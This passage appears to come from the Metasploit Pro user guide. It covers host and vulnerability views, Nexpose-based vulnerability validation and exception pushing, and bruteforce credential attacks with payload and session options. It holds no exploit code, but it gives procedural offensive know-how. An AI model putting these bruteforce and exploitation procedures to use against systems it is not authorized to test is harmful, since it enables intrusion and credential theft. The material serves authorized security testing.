The Hosts Page enumerates all hosts that have been fingerprinted. To access the Hosts page, select Analysis >Hosts from the Tasks bar. Search Filter Hostname OS Version Purpose IP Vulns Services Description Refers to the host name, or nickname,that uniquely identifies the machine. Refers to the operating system that runs on the host. Refers to the version of the operating system that the host runs, such as Windows 2000. Identifies whether the host is a client, server, or device. Refers to the IPaddress of a host. Identifies the number of vulnerabilities that has been identified for a host. Identifies the number of services that has been found for a host.
Notes Page
The Notes page shows any additional information that Metasploit was able to obtain from the hosts. Notes are bits of information that Metasploit is able to obtain from a host, but are not easily sorted into existing table columns.To access the Notes page, select Analysis >Notesfrom the Tasks bar. Search Filter Hostname Type IP Data Description Refers to the host name, or nickname,that uniquely identifies the machine. Identifies the method or source used to obtain the note, such as from an import or fingerprint. Refers to the IPaddress of a host. Refers to the information stored in the note.
Services Page
The Services Page shows all services that Metasploit was able to enumerate for open ports.To access the Services page, select Analysis >Services from the Tasks bar. Search Filter Hostname Description Refers to the host name, or nickname,that uniquely identifies the machine.
144
Description Refers to the active services that are active on the port, such as DCERPC, HTTP, and SSH. Refers to the protocol that the port runs, such as TCP or UDP. Identifies the operating system and version that the host runs. Refers to the IPaddress of a host.
Vulnerabilities Page
The Vulnerabilities Page shows all vulnerabilities that Metasploit was able to identify for the hosts in a project. To access the Vulnerabilities page, select Analysis >Vulnerabilitiesfrom the Tasks bar. Search Filter Hostname Info Ref IP Name Description Refers to the host name, or nickname,that uniquely identifies the machine. Refers to the description of the vulnerability. Refers to the vulnerability reference ID. Refers to the IPaddress of a host. Refers to the name of the vulnerability.
Description Refers to the host name, or nickname,that uniquely identifies the machine. Refers to the description of the vulnerability. Refers to the IPaddress of a host. Refers to the captured data type, such as a shadow file, private or public key, or a process list. Refers to the name of the vulnerability.
145
Nested Searches
Nesting is an advanced search strategy that enables you to build a more complex and precise search query. When you create a nested search query, you use parentheses to group search terms together with search operators and define the order in which they are processed. Each set of keywords that are enclosed in parentheses is processed as a single unit. Since Boolean logic operates on mathematical principles, the search expressions defined within parentheses take precedence over those that are not. If there is more than one set of parentheses, the innermost set of parentheses is processed first, then the next, and so on until the entire query has been interpreted. The search engine supports infinite levels of nesting. Note: The AND operator takes precedence over the OR operator when the search query is parsed.
Nested Searches
146
2. When the Hosts window appears, click the New Host button.
147
3. Under the Name &Address area, enter a name for the host in the Name field and enter an IP address for the host in the IP address field.
4. If you have an Ethernet address for the host, enter it in the Ethernet address field. 5. Under the Operating System area, you can add the operating system information for the host. For example, if you want to add the operating system for the host, you can enter an OS like Windows XP in the OSName field. This step is completely optional and is only recommended if you have the OSinformation for the host.
6. Select the Lock edited host attributes option if you do not want subsequent imports, discovery scans, or Nexpose scans to modify the host information. By default, this option is enabled. 7. If you want to add a service to the host, click the Add Service link. You will need to define the name, port, protocol, and state for the service.
148
Deleting a Host
1. From within a project, click the Analysis tab. 2. When the Hosts window appears, select the hosts that you want to delete.
149
Viewing Vulnerabilities
From within a project, select Analysis > Vulnerabilities from the Tasks menu.
Viewing Tags
From within a project, click the Tags tab on the Tasks menu.
3. When the Import Data page appears, click on the Browse button to open the File Upload window.
150
4. When the File Upload window appears, browse to the location of the file you want to import. Most import files will either be an XML or ZIP file. When you find the file that you want to upload, select it and click the Open button.
5. If you do not want to import the information for a specific host, you can enter the IPaddress for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address. 6. If you do not want the import to overwrite data for an existing host, you must select the Donot change existing hosts option. 7. Click the Import Data button.
151
Getting Started with Vulnerability Validation on page 153 Validating Nexpose Vulnerabilities with the Vulnerability ValidationWizard on page 157 Tracking Real-Time Statistics and Events for Vulnerability Validation on page 180 Nexpose Exceptions on page 187 Validated Vulnerabilities on page 193
152
VulnerabilityValidationWizard - This method is the easiest and should be used for bulk validations. It provides an all-in-one interface that walks you through importing and exploiting Nexpose vulnerabilities. It also helps you easily identify the vulnerabilities that are exploitable and nonexploitable so that you can send that data back to Nexpose. Manual Validation -This method requires much more legwork and should be used when you have specific vulnerabilities that you want to target. When you perform manual validation,you will need to set up a penetration test as you normally would. This includes creating a project, importing/scanning Nexpose sites, and exploiting specific vulnerabilities. After Metasploit Pro identifies the vulnerabilities that are exploitable and non-exploitable, you will be able to push that data back to Nexpose.
Creating a project. Scanning or importing Nexpose sites. Tagging Nexpose assets. (optional)
153
AssetGroups
The Nexpose term for a group of hosts or targets.
NexposePush
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.
Site
The Nexpose term for a collection of assets.
Validated Vulnerability
An vulnerability found by Nexpose that Metasploit Pro was able to successfully exploit and obtain a session.
Vulnerability
A security flaw or weakness in an application or system that enables an attacker to compromise the target system.
154
Vulnerability Exception
A vulnerability found by Nexpose that Metasploit Pro was unable to exploit.
Vulnerability Validation
The process of identifying vulnerabilities that are exploitable.
Before YouBegin
Before you can run the Vulnerability Validation Wizard, you will need to make sure that you have access to a Nexpose instance.You can only validate vulnerabilities withMetasploit Pro if you have Nexpose Enterprise or Nexpose Consultant version 5.7.16 or higher. Please check your Nexpose edition before attempting to use the VulnerabilityValidationWizard.
Before YouBegin
155
4. When the Configure a Nexpose Console page appears, enter the following information:
l
Console Address - The IP address to the server that runs Nexpose. You can also specify the server name. Console Port - The port that runs the Nexpose service. The default port is 3780. Console Username - The Nexpose user name that will be used to log in to the console. Console Password - The Nexpose password that will be used to authenticate the user account.
Before YouBegin
156
Importing Existing Sites - You can choose multiple sites from which you want to import hosts. Metasploit Pro pulls all of the hosts and their associated vulnerability information from the selected sites and stores their information in a project. Metasploit Pro only imports vulnerabilities for which it has matching exploit modules. For more information on how to import and exploit vulnerabilities with the Vulnerability Validation Wizard, see Importing and Exploiting Imported Nexpose Data on page 157. Running a Nexpose Scan - You can specify the hosts that you want to scan for vulnerabilities. Metasploit Pro creates a new site on Nexpose and adds the hosts to them. Nexpose scans the hosts for vulnerabilities. After the Nexpose scan completes, Metasploit Pro imports the vulnerabilities for which it has matching exploit modules. For more information on how to scan for vulnerabilities and exploit them with the Vulnerability Validation Wizard, see Scanning Nexpose Sites and Exploiting Identified Vulnerabilities on page 168.
157
3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.
4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
158
5. Verify that the Import existing Nexpose vulnerability data option is selected.
6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console from which you want to import sites. After you select a console, the wizard displays the list of sites that you can import. Note: Metasploit Pro will import all the assets from a site unless you explicitly define the assets that you want to exclude. To exclude assets from the import, click the Excluded Addresses dropdown and enter the addresses of those assets in the Excluded Addresses field.
7. From the sites list, select the sites that you want to import into the project. You can use the select all checkbox to choose all of the listed sites, or you can select the sites individually. Note: Metasploit Pro imports all assets from the site. For each asset, Metasploit Pro pulls and displays the IP address, operating system, MAC address, OS flavor, vulnerability name, and vulnerability references.
159
8. After you select the sites you want to import, click on the Tag tab and select the Tag option. Note: Tags are a useful tool if you want to easily create Nexpose asset groups in Metasploit Pro. If you do not want to tag assets, go to Step 10.
9. Select the Automatically tag by OS option if you want to tag each host with its operating system. Note: If this option is enabled, Windows hosts will be tagged with os_windows, and Linux hosts will be tagged with os_linux.
160
10. Select the Usecustom tagoption if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to define a custom tag.
161
11. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.
12. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should choose Great or Excellent.
162
13. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the GenerateReport option and skip to the last step.
14. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.
163
15. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.
164
16. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report. 17. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
165
18. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDRnotation.
19. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
166
20. Click the Launch button. The Findings window appears and shows the statistics for the test.
167
168
3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.
4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
169
6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console that you want to use to scan for vulnerabilities. The scan configuration page appears.
170
7. Enter the host addresses, or assets, that you want to scan in the Scan targets field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDRnotation.
8. Click the Scan template dropdown and select the template you want to use. Note: A scan template is a predefined set of scan options. There are a few default ones that you can choose from. For more information on each scan template, please see the NexposeUser's Guide.
171
9. Click the Tag tab. Note: If you do not want to tag assets, go to Step 13.
10. Select the Automatically tag by OS option if you want to tag each host with its operating system.
172
11. Select the Usecustom tagoption if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to create a custom tag.
173
12. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.
13. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should use Great or Excellent.
174
14. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the GenerateReport option and skip to the last step.
15. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.
175
16. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.
176
17. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report. 18. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
177
19. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDRnotation.
20. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
178
21. Click the Launch button. The Findings window appears and shows the statistics for the test.
179
180
3. Click the Vulnerability Validation task name. The Findings window appears.
From the Statistics tab, you can track the following data:
l
The total number of hosts that have been scanned or imported. The total number of unique vulnerabilities that have been identified. The total number of exploit modules that match Nexpose vulnerabilities.
181
The total number of vulnerabilities that Metasploit Pro was able to exploit. The total number of vulnerabilities that Metasploit Pro was unable to exploit.
182
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of hosts displayed.
183
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of vulnerabilities displayed.
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of exploit modules displayed.
184
You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability validations, the state will be exploited. 3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of validations displayed.
You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability exceptions, the state will be failed.
185
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of exceptions displayed.
186
Nexpose Exceptions
An exception defines the reason why a vulnerability exists. You apply exceptions to vulnerabilities that are typically low-risk or are used deliberately to mitigate bigger threats. Vulnerability exceptions help you exclude certain vulnerabilities from a report so that you can manage your risk score. You can apply exceptions to vulnerabilities that MetasploitPro was unable to exploit. These vulnerabilities have a status of Not Exploitable, which indicates that Metasploit Pro was unable to obtain a session on the target host due to some compensating control or back porting. Exceptions can be defined for vulnerabilities for the following reasons:
l
They are used as compensating controls or to mitigate additional risks. They represent an acceptable use case or deliberate practice, such as anonymous FTP access. They represent an acceptable risk and may require more resources than you are willing to invest to remediate.These vulnerabilities typically pose a minimal risk. They are false positives.
From the Exceptions page, you can perform the following tasks:
Nexpose Exceptions
187
View all the vulnerabilities that Metasploit Pro was unable to exploit. Assign the exception reason for each vulnerability. Assign expiration dates for vulnerability exceptions. Add comments to the vulnerability exception. Automatically approve vulnerability exception requests. Push exceptions back to Nexpose.
188
3. Click the Nexpose Console dropdown and select the console you want to push the exceptions to.
4. For each vulnerability, click the Reason dropdown and choose the vulnerability exception reason you want to assign to it. You can also provide additional information for the exception in the Comment field. For more information on exception reasons, see Vulnerability Exception Reasons on page 191. Note: If you want to define bulk exception settings for all hosts in a vulnerability group, select the All Hosts with this Vulnerability option. The Reason and Comment fields become available under to the vulnerability name.The reason you select applies to all hosts in that vulnerability group.
189
5. Choose the All Expire option if you want to set an expiration date for the vulnerability exceptions. If you do not want to set an expiration date for any vulnerability exceptions, keep the default Never Expire option selected and go to Step 6.
6. To set the same expiration date for all vulnerability exceptions, select on the All Expire option. A calendar appears. Find and select the date that you want to use. If you want to set a unique expiration date for each host, skip this step and go to the next step.
7. To set a unique expiration date for each host: a. Select the All Expire option.
b. Click on the Expire field next to each host to display the calendar.
c. Find the expiration date that you want to use and select it. 8. Deselect the Automatically Approve option if you do not want to approve any of the vulnerability exception requests from Metasploit Pro. Instead, you will manually approve the exception requests through the Nexpose Console.
190
9. Select the hosts that you want to push exceptions for. Use the Select All Hosts checkbox if you want to push exceptions for all hosts. 10. When you are ready to push the exceptions, click the Push Exceptions button.
False positive - Use this exception reason for a vulnerability that does not exist. Compensating control - Use this exception reason to indicate that a vulnerability is a compensating control, or a workaround for a security requirement. Acceptable use - Use this exception reason for any vulnerability that is used as part of organizational practices. Acceptable risk - Use this exception reason for any vulnerability that are considered low risk. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth. Other - Use this exception reason to define a custom exception. If you select Other, you can provide a custom exception reason in the Comment field.
191
Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed. Unreachable - Indicates that Metasploit Pro could not reach the network service. Bad-config - Indicates that the exploit settings were configured incorrectly. Disconnected - Indicates that the network service disconnected during a module run. Not-found - Indicates that Metasploit Pro could not find the application or service. Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application. Timeout-expired - Indicates that a timeout occurred. User-interrupt - Indicates that the user stopped the module run. No-access - Indicates that Metasploit Pro could not access the application. No-target - Indicates that the module configuration was not compatible with the target. Not-vulnerable - Indicates that the application was not vulnerable. Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.
192
Validated Vulnerabilities
A validated vulnerability is a vulnerability that Metasploit Pro was able to successfully exploit to obtain a session on a target host. Typically, the ability to gain a session on a host target provides enough evidence to show that a vulnerability poses a real security risk. However, you can use the session to collect additional evidence, such as screenshots, system files, and password files. If MetasploitPro is able to successfully exploit a vulnerability, the exploit status for the host will be Exploited. All vulnerabilities with a status of Exploited can be sent back to Nexpose as a validated vulnerability.
Validated Vulnerabilities
193
3. Click the Push Exploited Vulnerabilities button. The Task Log appears and shows you when the push is complete.
3. Scroll down to the Site Listing and find the site that you imported and tested in Metasploit Pro.
194
5. Scroll down to the Asset Listing and find the asset that has the validated vulnerability.
6. Click on the asset name. The asset page appears. 7. Find the Vulnerability Listing.
8. Click on the Exploited column to sort by validated vulnerabilities. Validated vulnerabilities will appear at the top of the column.
195
3. Use the filters to create the following query: validated vulnerabilities are present.
4. Click the Search button. The search returns a list of assets that have validated vulnerabilities.
196
Chapter 8:
Nexpose
About Nexpose on page 198 Nexpose Scan on page 200 Import Nexpose Data on page 204 Nexpose Asset Groups on page 212
About Nexpose
Vulnerability analysis is the process that detects, identifies, and assesses the vulnerabilities that exist within an organizational infrastructure. A vulnerability is a characteristic of an asset that an attacker can exploit to gain unauthorized access to sensitive data, inject malicious code, or generate a denial of service attack. To prevent security breaches, it is important to identify and remediate security holes and vulnerabilities that can expose an asset to an attack. Generally, to perform vulnerability analysis, you perform the following steps: 1. Define and classify network or system resources. 2. Identify potential threats for each resource. 3. Prioritize the risks. 4. Develop a plan to remediate the vulnerabilities. Nexpose automates the steps that you typically use to find and analyze vulnerabilities. Nexpose scans the assets to identify the active services, open ports, and applications that run on each machine. After the scan, Nexpose attempts to identify vulnerabilities that may exist based on the attributes of the known services and applications. Nexpose discloses the results in a scan report, which help you to prioritize vulnerabilities based on risk factor and determine the most effective solution to implement.
Nexpose Terminology
The following are common Nexpose terms:
Site
A site is a logical group of assets that has a dedicated scan engine. A site is similar to a project, However, projects are more for intermittent spot tests, whereas sites can run over a long period of time and provide you with historical, trending data.
Asset
An asset is a host or target that Nexpose scans for vulnerabilities.
Asset Group
An asset group is a collection of assets. An asset group does not have a dedicated scan engine. Instead,
Scan Template
A scan template defines audit level that Nexpose uses to perform a vulnerability scan.
About Nexpose
198
199
Nexpose Scan
You can use the Community and Enterprise editions of Nexpose to scan assets for known vulnerabilities. After you run a Nexpose scan, you can import the scan data into Metasploit Pro to validate the results of the vulnerability scan. Metasploit Pro provides a connector that allows you to run a Nexpose scan and automatically import the scan results into a project. Before you can run a Nexpose scan, you must configure a Nexpose Console for the Metasploit Pro to use. Metasploit Pro only supports the number of hosts that you have licenses for in Nexpose. If you provide more hosts than the number of licenses that you have available, the scan fails. For example, if you have a Community license, the most number of hosts Nexpose supports is 32. If you provide 35 hosts, the scan fails. You can download the Community edition of Nexpose from http://www.rapid7.com/vulnerabilityscanner.jsp. For more information on how to install and configure Nexpose, visit http://community.rapid7.com.
Nexpose Scan
200
5. Enter the console address. For example, if Nexpose runs on the local system, you can use 127.0.0.1.
201
7. Enter the user name that you use to log in to the Nexpose Console.
8. Enter the password that you use to log in to the Nexpose Console.
202
9. Select the Enabled option to initialize and activate the Nexpose Console. 10. Save the configuration.
203
3. When the Import Data window appear, click Choose Fileto choose a file to import.
204
4. When the File Upload window appears, navigate and choose a file to import. 5. Click Open after you select the file. 6. In the Exclude Address field, enter the target addresses that you want to leave out of the import. 7. Select Do not change existing hosts if you want to retain the current host information. 8. Click the Import button.
205
When the Scan Template Configuration page displays, locate the URL address box at the top of the Nexpose Console. The URL address box displays the address and the template ID for the scan template. For example, in the following address, https://my.console.address:3780/admin/wizard/scantemplate.html?templateid=dos-audit, the template id is dos-audit. For more information on scan template IDs, visit the Nexpose documentation. 1. From within a project, click the Analysis tab. 2. Click Nexpose from the Quick Tasks menu. 3. Select a Nexpose Console. The list shows Nexpose consoles that you have added to the project. 4. Enter the addresses for the scan targets. You can specify an IP address or a host name. There can be one address on each line. 5. Click the Scan Template list. Choose Custom, which enables you to select a custom scan template. 6. Click Show Advanced Options. 7. From the Advanced Nexpose Scan Settings area, enter the scan ID for the that you want to use in the Custom scan template name field. Note: Scan template IDs cannot contain a hyphen. If the scan template ID contains a hyphen, replace the hyphen with an underscore. If the scan template ID changes, the Nexpose scan does not update the scan template ID. You must update the Nexpose scan to use the new scan template ID. 8. Launch the Nexpose scan.
206
fe80::202:b3ff:fe1e:8329 for single addresses and 2001:db8::/32 for CIDR notations. For link local addresses, you must append the interface ID to the address. For example, enter fe80::1%eth0 for a link local address. 7. Select a scan template. 8. Click Show Advanced Options to configure additional options for the scan. 9. Select the Purge Scan results upon completion option. 10. Launch the Nexpose scan.
207
208
Note: For more information on configuring a Nexpose Console, see Configuring a Nexpose Console on page 200 1. Open the project that you want to import data into. 2. From the Tasks bar, click the Import button. The Import Data page appears. 3. Click the Choose File button to find the file you want to import. The File Upload window appears. Note: Metasploit Pro supports the following Nexpose export types: XML Export, XML Export 2.0, and Nexpose Simple XML Export. 4. Find and choose the Nexpose export you want to import. 5. Click Open after you select the file. 6. If you want to specify an exclusion list, enter the target addresses that you do not want to import in the Exclude Addresses field. Note: You can enter a single IP address, an address range, or a CIDR notation. If there are multiple addresses or address ranges, use a newline to separate each entry. 7. Select Do not change existing hosts if you do not want subsequent scans to modify the host information. 8. Select if you want Metasploit Pro to automatically tag hosts with their OS as the system imports them. 9. Enable any additional tags that you want to assign to the assets. 10. Import the data.
209
Vulnerability Exceptions
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability as an accepted risk. For example, you may want to define a exception for a vulnerability that poses minimal security risk, but requires more resources than you want to invest. In this particular case, it may be more cost effective to accept the vulnerability as a known risk than to remediate it. When you import Nexpose data or perform a Nexpose scan, Metasploit Pro pulls the exception data for the vulnerability and stores it in the project. After you test and verify the vulnerabilities, you may want to use the results of the penetration test to update the vulnerability exception for each asset. Use the Nexpose Exception Push feature in Metasploit Pro to create and approve vulnerability exceptions for an asset. After you define the exceptions, you can export, or push, the vulnerability exceptions from Metasploit Pro to Nexpose. The Nexpose Console displays the updated vulnerability exception information on the Asset Summary page. Note: You can only create an exception for a vulnerability that you import from Nexpose.
False positive - You may want to exclude false positives reported by Nexpose. A false positive occurs when a vulnerability scanner detects a vulnerability when none exists. Compensating control - You may want to exclude vulnerabilities that have mitigated risks. For example, if a vulnerability exists on a device that has an firewall in place, an organization may determine that the firewall provides enough protection and relegate the vulnerability as a minimal threat. Acceptable use - You may want to create an exception for vulnerabilities that are part of organizational practices. Acceptable risk - You may want to exclude vulnerabilities that are low risk vulnerabilities. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth.
Vulnerability Exceptions
210
If the project does not contain an active Nexpose Console or assets, the Nexpose Exception Push feature is unavailable. When you import or scan assets from Nexpose, you should enable automatic tagging. A tag is a label that you apply to an asset in order to group them together based on a set of criteria. A tag helps you quickly identify and find assets to run tests against. 1. Select Project > [Project Name] > Vulnerabilities from the main menu.
2. When the list of assets and vulnerabilities appears, select the assets that you want to use to create vulnerability exceptions. 3. Click Nexpose Exceptions. 4. When the New Nexpose Exceptions Push window appears, choose the Nexpose Console that you want to use to push the vulnerability exceptions. 5. Choose if you want to automatically approve the vulnerability exception. If you do enable this option, you will need to approve the vulnerability request through the Nexpose Console. 6. Choose if you want to set an expiration date for the vulnerability exception. If you choose this option, Nexpose will remove the exception from the asset on the date that you specify. 7. The Vulnerability Exceptions area displays a table that lists the vulnerability information for each asset that you added to the exception push. Select the vulnerability that you want to create an exception for. 8. Choose a reason for the exception. 9. Add any additional comments about the exception, such as how the vulnerability meets the requirements for the exception. 10. Create the exceptions. After you create the exceptions, open the Nexpose Console and verify that the asset shows the vulnerability exception that you pushed from Metasploit Pro.
211
212
213
Vulnerability Tracking
The Metasploit Web UI provides an interactive interface that you can use to visualize and validate the vulnerability data from a Nexpose report. Metasploit Pro identifies the assets, imports vulnerability data, indexes the data, and attempts to map the each vulnerability to an exploit. Metasploit Pro displays most of the content for each asset on the Hosts page. The Hosts page provides you with a high-level view of the assets that Metasploit Pro imported. You can see the number of services, vulnerabilities, and exploit attempts for each host. If you want to explore a bit more, you can visit the Vulnerabilities tab to learn more about each asset.
Vulnerability Tracking
214
Attempts Tab
If Metasploit Pro has run any module against the host, you can view the results from the Attempts tab. The Attempts tab shows when the modules were run, the person who launched the module, the result code for the module run, and the reason the module failed or succeeded. For example, you may want to view the Attempts tab if you want to find a list of modules that Metasploit Pro has run against a particular port or service.
Result Codes
A result code provides the reason why a module did not run successfully. The following result codes are available:
l
None - Indicates that Metasploit Pro could not determine if the module ran successfully or failed. Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed. Unreachable - Indicates that Metasploit Pro could not reach the network service. Bad-config - Indicates that the exploit settings were not configured correctly. Disconnected - Indicates that the network service disconnected during a module run. Not-found - Indicates that Metasploit Pro could not find the application or service. Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application.
215
Timeout-expired - Indicates that a timeout occurred. User-interrupt - Indicates that the user stopped the module run. No-access - Indicates that Metasploit Pro could not access the application. No-target - Indicates that the module configuration was not compatible with the target. Not-vulnerable - Indicates that the application was not vulnerable. Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.
Modules Tab
Metasploit Pro automatically maps modules to a host based on the open services and vulnerability information that is available. Due to the number of vulnerability checks that are available, Metasploit matches exploits based on services rather than vulnerabilities. The Modules tab displays a full list of exploits and auxiliary modules that Metasploit Pro can run against a particular asset.
Source Tab
The Source tab identifies the device used to import the host. For example, if you imported assets from a Nexpose report, the Source tab shows the Nexpose console ID and device ID.
216
Chapter 9:
Password Cracking
About Password Cracking on page 218 Bruteforce Attacks on page 218 Word Lists on page 232 Credential Management on page 229
Bruteforce Attacks - A bruteforce attack attempts a large number of common user name and password combinations to gain access to hosts. Metasploit Pro provides you with several preset bruteforce profiles that you can use to customize the bruteforce attack for the target environment. When Metasploit Pro successfully identifies a credential in a session capable module, such as SMB, SSH, Telnet, or MSSQL, the system automatically opens the session.
John the Ripper - John the Ripper, or JtR, is a tool that you can use to crack password hashes in order to recover weak passwords. To run JtR, you need to perform a module search for John the Ripper. There are JtR modules available for Linux, Windows, Oracle, and MySQL with varying bruteforce modes. Choose the module that works best for your target systems.
Bruteforce Attacks
A bruteforce attack tries a large number of common user name and password combinations in order to open a session on the target machine. After the bruteforce attack successfully guesses a credential, the system stores the user name and password in the workspace. In Metasploit Pro, a bruteforce attack launches service specific modules to attempt to crack the credentials for the service. You can choose the services and ports that you want to target, and the bruteforce attack chooses modules that target those services. If the bruteforce attack successfully cracks a credential and opens a session, you can use the session to gain further access and information for the system. To run a bruteforce attack, you must define the services that you want to target on a particular host or network range. In addition to the services, you can configure the bruteforce attack to exclude specific hosts and credentials, perform a dry run, and use a particular payload type.
218
The following list describes the color codes that Metasploit Pro uses for bruteforce tasks:
l
Green Message - Good status indicator Yellow Message - Credential found indicator Red Message - Bad status indicator
Bruteforce Attacks
219
The default only mode generates the following credentials: 16 credentials for PostgreSQL 29 credentials for DB2 141 credentials for SSH 141 credentials for Telnet 22 credentials for MSSQL 150 credentials for HTTP 4 credentials for HTTPS 13 credentials for SMB 21 credentials for FTP
4,000 credentials for PostgreSQL 3,000 credentials for DB2 10,000 credentials for MySQL 1,000 credentials for SSH 1,000 credentials for Telnet 10,000 credentials for MSSQL 6,000 credentials for HTTP 1,000 credentials for HTTPS 4,000 credentials for SMB 1,000 credentials for FTP
Bruteforce Attacks
220
The system tries these generated credentials after the current known good credentials. The system adjusts the credentials figures after each successive run, if the credentials become known as the modules run.
12,000 credentials for PostgreSQL:5432 9,000 credentials for DB2:50000 30,000 credentials for MYSQL:3306 132 credentials for SSH:22 132 credentials for Telnet:23 30,000 credentials for MSSQL:13013 18,000 credentials for HTTP:8080 (tomcat) 3,000 credentials for SMB:445 (Microsoft)
SSH and Telnet are not subject to the deep multiplier because these credentials take longer to test than the other services.
Bruteforce Attacks
221
Target Services
Bruteforce targets the following services: SMB, PostgreSQL, DB2, MySQL, MSSQL, Oracle, HTTP, HTTPS, SSH, SSH_PUBKEY, Telnet, FTP, POP3, EXEC, LOGIN, SHELL, VNC, SNMP, and AFP.
Target Addresses
Defines the hosts explicitly included in the bruteforce attack.
Excluded Addresses
Defines the hosts explicitly excluded from the bruteforce attack.
Dry run
Runs a bruteforce attack, prints a transcript of the modules, and quits the attack. Metasploit Pro does not run a live bruteforce attack against the target system.
Additional credentials
Defines the user name and password combinations that the bruteforce attack uses. Use commas to separate user name and password combinations. Use one of the following methods to specify additional credentials for the bruteforce attack:
Bruteforce Attacks
222
For domain-specific user name and password combinations, use the following format: domain/username.password. For user names with no password, define the user name only. For user names with multiple passwords, use the following format: username password1, password2, password 3.
SMB Domains
Adds the domain as a space delimited list for services that accept Windows-based authentication.
Payload Type
Specifies the type of payload that the bruteforce attack uses. You can choose Meterpreter or command shell.
Listener Ports
Defines the port or port range that the bruteforce attack uses in reverse connect payloads.
Connection Type
Defines the connection type that the payload uses. Choose from auto, reverse, or bind.
Timeout overall
Limits the total amount of time that the system allocates to the bruteforce attack.
Bruteforce Attacks
223
Bruteforce Attacks
224
Target Services
After Metasploit Pro opens the session, you can select the services that you want to target in the bruteforce attack. You can target the following services:
l
Bruteforce Attacks
225
MySQL MSSQL Oracle POP3 Postgres Shell SMB SNMP SSH SSH_PUBKEY Telnet VMAUTHD VNC WinRM
226
credentials, then you can use the credentials to administer VMware. You cannot access VMware directly from Metasploit Pro. However, after you gain access to a virtual machine, you can run post-exploitation modules to identify more information about the machine, such as configuration settings, logins, and other virtual machines. 1. Open a project. 2. Click the Analysis tab. 3. Select the virtual target that you want to bruteforce. 4. Click Bruteforce. The Bruteforce window appears. 5. Metasploit Pro automatically populates the target address field with the vmauthd target address. 6. Launch the bruteforce attack.
227
5. Select Quick for depth of the bruteforce attack. 6. Select the services that you want the bruteforce attack to target. 7. Click Show Advanced Options to configure additional options for the bruteforce attack. 8. Enter the credential that you want to use for the bruteforce attack in the Additional Credentials field. For example, enter admin admin. 9. Launch the bruteforce attack.
228
Credential Management
You can import sets of untested credentials into Metasploit Pro. Use imported credentials when you run the scan in normal, deep, or imported only mode. If you import multiple files, Metasploit Pro consolidates the credentials from each file and stores the data within a single, running file. The imported credentials do not display under the credentials area. To view the imported credentials, you can download the imported credentials as a single text file. Note: You should use the Additional Credentials option for known credentials or for bruteforce attacks that use the Include known credentials option.
PWDump
A PWDump file can contain SMB hashes and space delimited user name and password pairs. Each item must be on a separate line. The bruteforce attack attempts the SMB hash credentials against services that accept SMB hashes as plain text. When you use a PWDump file, you must define the SMB domains to target services that accept Windows authentication. When you use a PWDump file, use the imported only bruteforce depth to test only this list of credentials. Use this format if you have an exported a Metasploit PWDump.
Example:
